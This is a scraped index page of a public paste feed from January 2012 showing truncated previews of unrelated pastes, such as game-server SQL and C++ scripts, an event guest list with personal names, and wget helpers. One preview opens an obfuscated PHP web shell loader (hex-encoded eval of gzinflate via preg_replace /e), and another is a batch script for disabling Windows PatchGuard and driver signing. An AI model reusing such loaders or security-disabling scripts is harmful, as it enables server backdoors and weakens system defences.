All pastesPublic feed

Public feed

Pastes people chose to make public. Author names hidden.
  • Unnamed

    2107705·text·169 B·2012-01-30 12:04 UTC
    --- onNewCallCreated 9f3d398: ooh323c_840
    +++ onNewCallCreated ooh323c_840
    --- onCallCleared ooh323c_840
    --- find_call
    +++ find_call
    +++ onCallCleared
  • Unnamed

    2107704·text·169 B·2012-01-30 11:49 UTC
    --- onNewCallCreated 9f21278: ooh323c_349
    +++ onNewCallCreated ooh323c_349
    --- onCallCleared ooh323c_349
    --- find_call
    +++ find_call
    +++ onCallCleared
  • Miscellany

    2107699·text·3.1 KB·2012-01-30 10:54 UTC
    Gabby Brett
    Host
    
    Mitchell Anderson
    Going
    
    Friends
    Will Carey
    Going
    
    Friends
    Lachlan Bond
    Going
    
    Friends
    Timo van Hest
    Going
    
    Friends
    James Dyke
    Going
    
    Friends
    Danny-Elle Kiss
  • Untitled

    2107698·text·4 B·2012-01-30 10:51 UTC
    asdf
  • Untitled

    2107697·text·3.1 KB·2012-01-30 10:49 UTC
    Gabby Brett
    Host
    
    Mitchell Anderson
    Going
    
    Friends
    Will Carey
    Going
    
    Friends
    Lachlan Bond
    Going
    
    Friends
    Timo van Hest
    Going
    
    Friends
    James Dyke
    Going
    
    Friends
    Danny-Elle Kiss
  • Something

    2107692·text·22.7 KB·2012-01-30 09:49 UTC
    <?php $auth_pass="";$color="#df5";$default_action='FilesMan';$default_use_ajax=true;$default_charset='Windows-1251';preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x
  • Someone

    2107690·text·2.3 KB·2012-01-30 09:45 UTC
    6. Aby zapewnić odpowiednią ochronę prawną oraz skuteczne środki zaradcze, o których mowa w ust. 5, każda ze Stron zapewnia ochronę co najmniej w odniesieniu do:
    
    a) w stopniu określonym w swoim pra
  • sql statemnet

    2107686·sql·1.0 KB·2012-01-30 08:43 UTC
    DELETE FROM `gameobject_loot_template` WHERE `entry`=190459 AND `item`=38340;
    DELETE FROM `gameobject_loot_template` WHERE `entry`=190462 AND `item`=38346;
    DELETE FROM `gameobject_loot_template` WHE
  • sql

    2107685·sql·1.1 KB·2012-01-30 08:42 UTC
    -- Delete --
    DELETE FROM `gameobject_loot_template` WHERE `entry`=190459 AND `item`=38340;
    DELETE FROM `gameobject_loot_template` WHERE `entry`=190462 AND `item`=38346;
    DELETE FROM `gameobject_loot
  • Lab Work Fix (by Alex Mercer)

    2107684·cpp·2.6 KB·2012-01-30 08:41 UTC
    include "ScriptPCH.h"
    
    enum eNums {
     LAB_WORK_QUEST = 12557,
    
     MUDDY_MIRE_MAGGOT = 38386,
     WITHERED_BATWING = 38339,
     AMBERSEED = 38340,
  • Untitled

    2107683·cpp·1.7 KB·2012-01-30 08:36 UTC
    include "ScriptPCH.h" enum eNums { LAB_WORK_QUEST = 12557, MUDDY_MIRE_MAGGOT = 38386, WITHERED_BATWING = 38339, AMBERSEED = 38340, CHILLED_SERPENT_MUCUS = 38346, MAGGOT_NPC = 28293, BATWING_NPC = 2829
  • Untitled

    2107682·text·1.7 KB·2012-01-30 08:36 UTC
    include "ScriptPCH.h" enum eNums { LAB_WORK_QUEST = 12557, MUDDY_MIRE_MAGGOT = 38386, WITHERED_BATWING = 38339, AMBERSEED = 38340, CHILLED_SERPENT_MUCUS = 38346, MAGGOT_NPC = 28293, BATWING_NPC = 2829
  • Anonymous

    2107679·text·757 B·2012-01-30 08:03 UTC
    @echo off
    :BEGIN
    CLS
    echo Press 1 to Disable Patchguard and Driver Signing.
    echo Press 2 to Revert to default settings. %1
    CHOICE /N /C:12
    IF ERRORLEVEL ==2 GOTO TWO
    IF ERRORLEVEL ==1 GOTO ONE
  • shopplugin code

    2107675·text·274 B·2012-01-30 07:17 UTC
    <td colspan="2" rowspan="5" class="item">
     <?php if (shopp('cart','needs-shipping-estimates')): ?>
     <small>Estimate shipping &amp; taxes for:</small>
     <?php shopp('cart','shipping-estimates')
  • Trivia.tcl

    2107670·text·40.3 KB·2012-01-30 07:00 UTC
    
        
  • script meteo bash

    2107668·bash·1.5 KB·2012-01-30 06:16 UTC
    *** Fichier meteo.sh ***
    
    #!/bin/bash
    
    set -xv
    
    ########################################################################
    # METEO
  • e621 wget

    2107644·text·1.4 KB·2012-01-30 05:36 UTC
    # <post> : Emit the file download url for a given post
    e621_post_to_link() {
     post="${1}"
     [ "${post}" ] || return 1
     wget -qO- "http://e621.net/post/show/${post}" | sed -e '/<li>Size: <a href=
  • e621 wget

    2107643·text·1.4 KB·2012-01-30 05:33 UTC
    # <post> : Emit the file download url for a given post
    e621_post_to_link() {
     post="${1}"
     [ "${post}" ] || return 1
     wget -qO- "http://e621.net/post/show/${post}" | sed -e '/<li>Size: <a href=
  • e621 wget

    2107642·text·1.4 KB·2012-01-30 05:32 UTC
    # <post> : Emit the file download url for a given post
    e621_post_to_link() {
     post="${1}"
     [ "${post}" ] || return 1
     wget -qO- "http://e621.net/post/show/${post}" | sed -e '/<li>Size: <a href=
  • Stuff

    2107636·text·176.1 KB·2012-01-30 04:39 UTC
    
        

older pastes →